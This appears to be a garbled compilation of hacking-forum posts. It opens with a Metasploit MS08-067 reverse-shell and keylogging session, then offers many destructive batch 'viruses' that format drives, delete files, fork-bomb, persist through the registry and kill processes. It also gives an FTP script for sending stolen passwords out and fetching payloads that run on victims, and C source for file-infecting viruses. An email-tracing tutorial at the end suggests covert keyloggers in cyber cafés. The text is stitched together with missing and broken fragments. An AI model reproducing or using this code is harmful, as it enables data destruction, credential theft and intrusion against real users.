$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Simple Virus Making

If you think that Notepad is useless, then you are wrong, because you can do a lot of things with Notepad that you could never have imagined. In this hack I will show you how to make a simple .bat file (virus) that can't be detected by any antivirus.
Here are some good viruses. I am not responsible for any kind of damage to your system.

Copy this into Notepad and save it as flood1.bat.

@ECHO A Sharma's Creation

GOTO start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

CD %HomeDrive%\
SET sharma=1
GOTO flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do: this is an extremely harmful virus that will keep replicating itself until your hard drive is totally full, and it will destroy your computer.

Some Funny Virus Codes

Simple binary codes that can format the system drive and secondary drives.

Copy the following into Notepad exactly as it is:


Save it as an EXE; any name will do.

Send the EXE to People And Infect
Some other interesting formatting codes:

format c:\ /Q/X - this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100


format d:\ /Q/X - this will format your drive d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100


format a:\ /Q/X - this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100


del /F/S/Q c:\boot.ini - this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001


Some more interesting stuff:

open notepad

erase c:\windows

and save as


What does it do: it will erase c:\windows.

Here is another one which is funny:

color 0a
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."

This code opens windows endlessly (infinite windows) until you restart the computer. Write the code in Notepad and save it as denger.bat:

@echo off
copy 0% denger.bat
start denger.bat

This code shuts down the computer:

@echo off
shutdown -s -t 5 -c "Shutdown"

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

Save it as Dell.bat.

Want worse? Then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file.

One more. Try this one:

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

Then it is complete. Save it as any file you want in .bat format and enjoy. It's really dangerous; don't try it on your own PC.

NOTE: How to add your own created viruses into startup; this will make it difficult to detect them and to remove them.

For this you need a registry updater software.

Now move your .bat file to C:\Windows and then simply run this software; your virus will be added to your startups. I tried this with shutdown: as my computer starts, it shuts down after 2 seconds.

Do not try it on your PC. Don't mess around; this is for educational purposes only.


@Echo off
color 4
title 4
title R.I.P
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide itself and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

The first code we are going to look at is one that makes the CD tray open and close repeatedly until shutdown, or (don't tell your friends) until you press Ctrl + Alt + Delete, go to Processes, and end wscript.exe. (This code is VBS, so save it in Notepad as whateveryouwant.vbs.)

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
end if

A code that turns your Caps Lock on and off repeatedly. Also VBS; end it the same way as last time. This turns Caps Lock on and off every tenth of a second.

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"


A batch that is like a computer password; maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
erase password.bat
erase password.dat
echo Turn off PC
goto hello
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g

A batch that switches the left mouse button with your right mouse button (also maybe add code to stick it in someone's autoexec; that would really make them mad).

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it

A batch file that will shut down your computer and send a few messages about the Matrix. Rather bland and could be worked on a little bit more; someone could tweak it a little and I'll repost it and give you credit. Perhaps change the DOS text to green.

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60

This is a VBS file, so of course save it as VBS; you can replace the text in this code with whatever you want.

Set wshshell = wscript.CreateObject("WScript.Shell") "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"

Carpet Bomb:

Once the batch file is executed, it copies itself hundreds of times onto the desktop and into the startup folder. This means that it'll regenerate once the computer is restarted, even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command-line args are optional, and include "disinf" for erasing all of the copies permanently.

:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer


Creating a batch Bomb

Copy and paste the below into Notepad and save it as hi.bat (not .txt).
Run it, and enjoy anarchy.


@echo off
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat

How to make a shutdown file and disguise it as something else!

This article is a pretty simple one; maybe most of you guys know it already... in case you don't, you can play around and have fun...

How to make a shutdown file and disguise it as something else (internet, etc.)

Step 1: Right click on your desktop or wherever you want to make this shutdown file

Step 2: look for new, then shortcut

Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force-close open documents
note: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: Push Next, then name it whatever you like; for example we will put Internet Explorer.

Step 5: Right-click on the file you just made and go to Properties.

Step 6: Hit Change Icon. (This could be under the Advanced tab.)

Step 7: An error message should pop up letting you know there aren't any pictures in c:\windows\system32. Hit OK.

Step 8: A list of icons should show up. Click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for Internet Explorer.)

Now you're done; see, that wasn't so hard, was it?
Put this in the Startup folder to make people even MORE mad!

NOTE: This can easily be stopped by typing shutdown -a in Run.

Sending Files Via ftp Batch!

OK, so I made a password stealer that would output a .txt file to the Windows folder. I then made an FTP batch that would upload the txt file to my server; so far I've managed to get some passwords, but not for anything important. So if you want to know how to make an FTP batch, here's how.

First, for example, we're going to try to upload a file called Test.txt to our server.


ftp -n -i -s:MyUploadFiles.ftp

First make a file called upload.bat and put this in it. Now we need to make the myuploadfiles.ftp; if you want to call it something else, then change myuploadfiles.ftp to what you want, but KEEP the .ftp at the end.

OK, now it's time to create myuploadfiles.ftp, or whatever you called it before.

open your-host

user password


send test.txt

This is the bit where you have to change the username, password and host to match your FTP host. Then change the send test.txt to whatever file you want to upload; it doesn't have to be a txt file, it can be any file.

Now make sure both files are in the same directory as each other and run the .bat file. Check your FTP server and guess what's sitting there: test.txt! So if you want to upload a file from someone's PC, you could use this?

Also, there's nothing stopping you from putting the "get" command in the .ftp, say get download.bat. Whenever you want to change what it does, call it download.bat and put it on the server; then the victim will download it and it will be executed.

Folder Replicator Batch VIRUS

Here is a simple batch virus that contains only 6 lines. It has the tendency to replicate itself again
and again and keeps on creating a folder with the same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd C:\Documents and Settings\username\Desktop
md Virus
cd Virus
goto loop

2. Save it as a batch file with the extension .bat.
3. Then run it on the victim's computer to infect it.
4. Anyhow, it doesn't cause much harm, but it replicates a folder inside a folder and goes on.

struct ffblk ffblk;

char old_dir[MAXPATH];
Get_Path(old_dir); /* Save the old directory */
Pick_A_Dir(); /* Find a new directory to */
Infect_Directory(); /* infect and infect it. */
chdir(old_dir); /* Return to old directory */
return 0;

int done;
chdir(".."); /* First, Go out a DIR. */
done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
/* root and DOS */
if (done)

if (done) chdir("\\DOS\\");

return 0;

int done;
done = findfirst("*.BAT",&ffblk,0);
while (!done) /* Find all .BAT files */
{ /* and add code to run */
Do_Batch(); /* BAT&COM if not */
done = findnext(&ffblk); /* already there */

if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */
{Copy_Virus();} /* not exist, then */
return 0; /* copy it into dir.*/

FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];
Get_Path(vpath); /* Get path for adding path */
/* specifier in commands */
if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */
batch=fopen(ffblk.ff_name, "rt+");
fseek(batch, -11, SEEK_END);

Infection_Buffer[11]=0; /* Terminate String */
if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
{ /* Batch is */
fseek(batch, 0, SEEK_END); /* infected.*/

} /*^- Add command */
/* to batch */

return 0;

FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024]; /* Copy the virus to */
/* new directory */

while (write_length==1024)

return 0;

Get_Path(char *path)

strcpy(path, "A:\\");
path[0] ='A' + getdisk(); /* Returns current path */
getcurdir(0, path+3);
return 0;

----- End of Code -----

/* It will infect all .COM files in the current directory */

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;

done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/

printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */

fread(buff,x,1,Virus); /* Finish off copy */

fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */

/* Activation would go */
/* here */
return (0); /* Terminate */


enjoy hacking


it is used to hack gmail account>>>>

Here I shall discuss how to trace an email sender from the email header. I shall take my MSN account as an example. But before I go into depth, I shall split the email header and explain each part of it for better understanding. By Ankush

Viewing Email Header
Every e-mail comes with information attached to it that tells the recipient its history. This information is called a header. The full header of the example email is given below; all this information comes with the email. The header contains the information essential to tracing an e-mail. The main components to look for in the header are the lines beginning with "From:" and "Received:". However, it might be instructive to look at what the various lines in the header mean.

MIME-Version: 1.0
Received: from ([]) by with Microsoft SMTPSVC(5.0.2195.6713); Tue, 25 Nov 2003 19:56:18 -0800
Received: from pavilion ([]) by (rwcrmhc11) with SMTP id <20031126034457013001nk6pe>; Wed, 26 Nov 2003 03:44:57 +0000
X-Message-Info: JGTYoYF78jGkTvdOiviUvHyY85nt7iLD
Message-ID: <000801c3b3cf$a92237a0$>
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To: "Leona"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-OriginalArrivalTime: 26 Nov 2003 03:56:18.0897 (UTC) FILETIME=[3F5AFC10:01C3B3D1]

Some e-mail programs, like Yahoo or Hotmail, have their full headers hidden by default. In order to view the full header, you must specifically turn on that option. Some ways of doing this in different e-mail programs follow here:

Viewing full Header in Yahoo and Hotmail
Click Options -> Click Mail Preferences -> Click Show Headers -> Click "All" -> Click "Save"
Click Options -> Click Mail Display Headings (under "Additional Options") -> Click Message Headers -> Click "Full" ->
Click "OK"

Viewing full Header in Email Clients like (Outlook and Eudora etc)
Outlook Express
If you use OE, at least the version I have (5.5), you may not have much luck; it sometimes gives little more information than what you can see in the main window. But here's the application path anyway:
Click File/Properties/Details to find the header information.
Outlook
First, highlight the email in your Incoming window, right-click on it, and select Options. The window that comes up will have the headers at the bottom.
Eudora
Be sure the message is open, then click the 'Blah, Blah, Blah' button from the Tool Bar, and the headers will appear.
Select Reader/Show All Headers/
Netscape Mail
Select Options/Headers/Show All Headers
Netscape Messenger 4.0 and 4.5
Select View/Headers/All

Now I will discuss the full header in detail:

Message ID:
It is used to identify the system from which the message originated (i.e. the system the sender logged in from). However, this is too easy to forge, and is consequently not reliable.

X- headers are user-defined headers. They are inserted by email client programs or applications that use email. Here, from the X- headers inserted into the email by the email client, it is clear that the sender used Microsoft Outlook Express 6.00.2800.1106 to send this email.
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106

MIME-Version:
MIME stands for Multipurpose Internet Mail Extensions. It tells the recipient what types of attachments are included in the email. It is a format that allows people to send attachments that do not contain standard English words, but rather graphics, sounds, and e-mails written with other characters. The MIME-Version field merely confirms that the version of MIME used corresponds to the standard version (which is currently 1.0).

From:
From: is useless in tracing an e-mail. It consists of the email address of the sender, but this can obviously be fake. One can use any fake-mailer to fake the sender's name.

Content-Type:
This line tells the receiving e-mail client exactly what MIME type or types are included in the e-mail message. A Content-Type of text/plain; charset="us-ascii" just tells us that the message contains a regular text message that uses English characters. ASCII is the American Standard Code for Information Interchange and is the system used to convert numbers to English characters.

Return-Path:
It is the address to which your return e-mail will be sent. Different e-mail programs use other variations of Return-Path:. These might include Return-Errors-To: or Reply-To: etc.

Received:
This field is the key to finding out the source of any e-mail. Like a regular letter, an e-mail gets postmarked with information that tells where it has been. However, unlike a regular letter, an e-mail might get "postmarked" any number of times as it makes its way from its source through a number of mail transfer agents (MTAs). The MTAs are responsible for properly routing messages to their destination.

Let me strip down the above email header to make it easy to understand. The header is split and the two Received headers are given below.
Received Header 1: - Tue, 25 Nov 2003 19:56:18 -0800
from ([])
with Microsoft SMTPSVC(5.0.2195.6713)

Received Header 2: - Wed, 26 Nov 2003 03:44:57 +0000
from pavilion ([])
by (rwcrmhc11)
with SMTP
id <20031126034457013001nk6pe>

The MTAs are "stamped" on the e-mail's header so that the most recent MTA is listed at the top of the header and the first MTA through which the e-mail passed is listed at the bottom. In the above sample e-mail header, the e-mail first passed through (, and at last made its way through (.

In Received Header 2, the part marked in red, "pavilion", is either the domain name of the server from which the email originated or the name of the computer from which the email was sent. By doing a DNS query for "pavilion", it is confirmed that it is not a known host name; hence, it must be the name of the computer from which the mail originated. "" is the IP address from which the mail might have originated, or it is the IP address of the ISP (Internet Service Provider) to which the user was connected while sending the mail.

Note: Correct me if I am wrong, most of the time "HELO" is prefixed to the system name from which the mail has originated, but its accuracy is not reliable.
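As an added example (not from the article), the following Python parses Received headers and walks them the way the article describes: from the receiving MTA's own stamp at the top down to the first hop at the bottom, stopping where the chain of "by" and "from" hosts breaks, since anything below that point was under the sender's control. The header text, hostnames and addresses are constructed (example domains and RFC 5737 documentation ranges) because the article's real values did not survive extraction.

```python
import email
import re
from email.utils import parsedate_to_datetime

# Constructed sample (not the article's real header): hostnames are example
# domains and addresses come from the RFC 5737 documentation ranges.
SAMPLE_HEADER = (
    "MIME-Version: 1.0\n"
    "Received: from mail-in.example.net ([198.51.100.7]) by mx.example.com\n"
    "\twith Microsoft SMTPSVC(5.0.2195.6713); Tue, 25 Nov 2003 19:56:18 -0800\n"
    "Received: from pavilion ([192.0.2.45]) by mail-in.example.net (rwcrmhc11)\n"
    "\twith SMTP id <constructed-id-0001>; Wed, 26 Nov 2003 03:44:57 +0000\n"
    "X-Mailer: Microsoft Outlook Express 6.00.2800.1106\n"
    "From: \"Leona\" <leona@example.net>\n"
    "Subject: constructed sample\n"
    "\n"
    "body\n"
)

# The same message with one extra Received line at the bottom, as a sender can
# add before handing the mail to the first real MTA (also constructed).
FORGED_HEADER = SAMPLE_HEADER.replace(
    "X-Mailer:",
    "Received: from innocent.example.org ([203.0.113.9]) by relay.example.org\n"
    "\twith SMTP; Mon, 24 Nov 2003 10:00:00 +0000\n"
    "X-Mailer:",
    1,
)

RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"                             # name given in HELO/EHLO
    r"(?:\s*\((?:[^\s()]+\s+)?\[(?P<ip>[0-9.]+)\]\))?"  # [ip] the MTA actually saw
    r".*?\bby\s+(?P<by>\S+)",                           # MTA that wrote the stamp
    re.IGNORECASE | re.DOTALL,
)


def parse_hops(raw_message):
    """Return the Received stamps in transit order: index 0 is the bottom
    stamp (first MTA the mail reached), the last entry is the top one
    (the receiving side's own MTA)."""
    msg = email.message_from_string(raw_message)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())  # unfold continuation lines
        m = RECEIVED_RE.search(value)
        stamp = value.rsplit(";", 1)[1].strip() if ";" in value else ""
        hops.append({
            "helo": m.group("helo") if m else None,
            "ip": m.group("ip") if m else None,
            "by": m.group("by") if m else None,
            "time": parsedate_to_datetime(stamp) if stamp else None,
        })
    return hops


def chain_warnings(hops):
    """Each stamp's 'by' host should reappear as the 'from' host of the next
    newer stamp, and time should not run backwards. A break marks where the
    sender-controlled part of the header begins."""
    warnings = []
    for older, newer in zip(hops, hops[1:]):
        if older["by"] and newer["helo"] and older["by"].lower() != newer["helo"].lower():
            warnings.append(f"chain breaks between {older['by']} and {newer['helo']}")
        if older["time"] and newer["time"] and newer["time"] < older["time"]:
            warnings.append(f"time runs backwards at {newer['by']}")
    return warnings


def origin(hops):
    """Walk down from the top (trusted) stamp while the chain stays continuous;
    the stamp reached is the best evidence of origin: its [ip] is what a real
    MTA observed, its 'from' name is only what the sender claimed."""
    if not hops:
        return None
    i = len(hops) - 1
    while (i > 0 and hops[i - 1]["by"] and hops[i]["helo"]
           and hops[i - 1]["by"].lower() == hops[i]["helo"].lower()):
        i -= 1
    return hops[i]


if __name__ == "__main__":
    for label, raw in (("clean", SAMPLE_HEADER), ("forged", FORGED_HEADER)):
        hops = parse_hops(raw)
        o = origin(hops)
        print(f"{label}: {len(hops)} hops, origin from {o['helo']} [{o['ip']}] "
              f"at {o['time']}; warnings: {chain_warnings(hops)}")
```

In the forged variant the bottom stamp claims a different host, so the walk stops at the "pavilion" stamp, which is the last one a real MTA wrote.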

Trace who owns the IP address
Every computer hooked up to the internet is assigned an IP address. Individual users get a dynamic IP address when they log on to an ISP to access the internet; these IP addresses are assigned by the ISP itself. Organizations usually possess a static/public IP address, which is stored in a database of registries.

There are three major registries covering different parts of the world. They are:
=> American Registry for Internet Numbers (ARIN): assigns IP addresses for the Americas and for sub-Saharan Africa.
=> Asia Pacific Network Information Centre (APNIC): covers Asia.
=> Réseaux IP Européens (RIPE NCC): covers Europe.

Thus, to find out which organization owns a particular IP address, you can make a "WHOIS" query in the database of any of these registries. You do this by typing the IP address into the "WHOIS" box that appears on each of these websites.

The "Received" header will have the IP address of the ISP in case the user dialed up to the ISP while sending the email. But if the user sent the email from within a corporate network, then the corporate public/static IP address is logged.

By giving a "WHOIS" query for at, the following result has been displayed:

Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1) -
Comcast Cable Communications, Inc. NJ-NORTH-14 (NET-68-37-16-0-1) -

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

From the above queries it is found that the IP address ( is owned by "Comcast". By making further queries on "Comcast", it is found that it is the name of an ISP located in NJ, US 08002. The result of the further query is given below:

OrgName: Comcast Cable Communications, Inc.
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
Country: US

NetRange: -
NetHandle: NET-68-32-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
RegDate: 2001-11-29
Updated: 2003-11-05

TechHandle: IC161-ARIN
TechName: Comcast Cable Communications Inc
TechPhone: +1-856-317-7200

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

Now, since the IP address found belongs to an ISP, it is clear that the sender dialed up to this ISP while sending the email. For further enquiry we can then request the ISP to provide us with details of the user who dialed up to them at that given point in time (Wed, 26 Nov 2003 03:44:57 +0000). If the ISP cooperates, they will check their user and message logs to see who was logged into that particular IP address at that time and date. This will reveal the sender's telephone number from which he/she dialed in to the ISP. Once we have the telephone number we can easily retrieve the name and address of the sender.

Now the above case is solved, but there are also other cases where the IP address found in the email header may be owned by an organisation or a cyber cafe. Below I have discussed how you can trace the sender in both of these cases.

In case the IP address found belongs to an organisation, then you have to request them to provide information about the user who sent the mail from within the organisation's network. They should have user and message logs on their firewall / proxy and can trace each of their computers connected at the given point in time. By supplying the organisation with the e-mail header of the offending e-mail, they can check these logs and hopefully produce information on the user of that machine.

In case it is found that the sender sent the email from a cyber-cafe, then it becomes a difficult task to trace him/her. The user may not be a frequent visitor to that cyber-cafe. But let's assume that you receive such mails frequently from that particular cyber-cafe; then you can install "key-loggers" on the computers at the cafe. These programs record users' keystrokes, thus creating a record of everything that was typed at a particular terminal. By reviewing the key-logger logs you may be able to trace the sender in this case.

Note: While these methods would aid greatly in identifying an e-mail sender, they also would impinge on the rights of others using the computers to conduct their personal business. Such a conflict defines the ongoing struggle between the fight against terrorism over the Internet and the right to privacy, which will continue to evolve in the years ahead.

## Send me information if you know a better way to trace a sender who uses cyber cafe to send email. ##


Search the IP-COUNTRY table for the unique record whose range contains the IP number, i.e. the record where the IP number lies between the "From IP Number" and the "To IP Number".

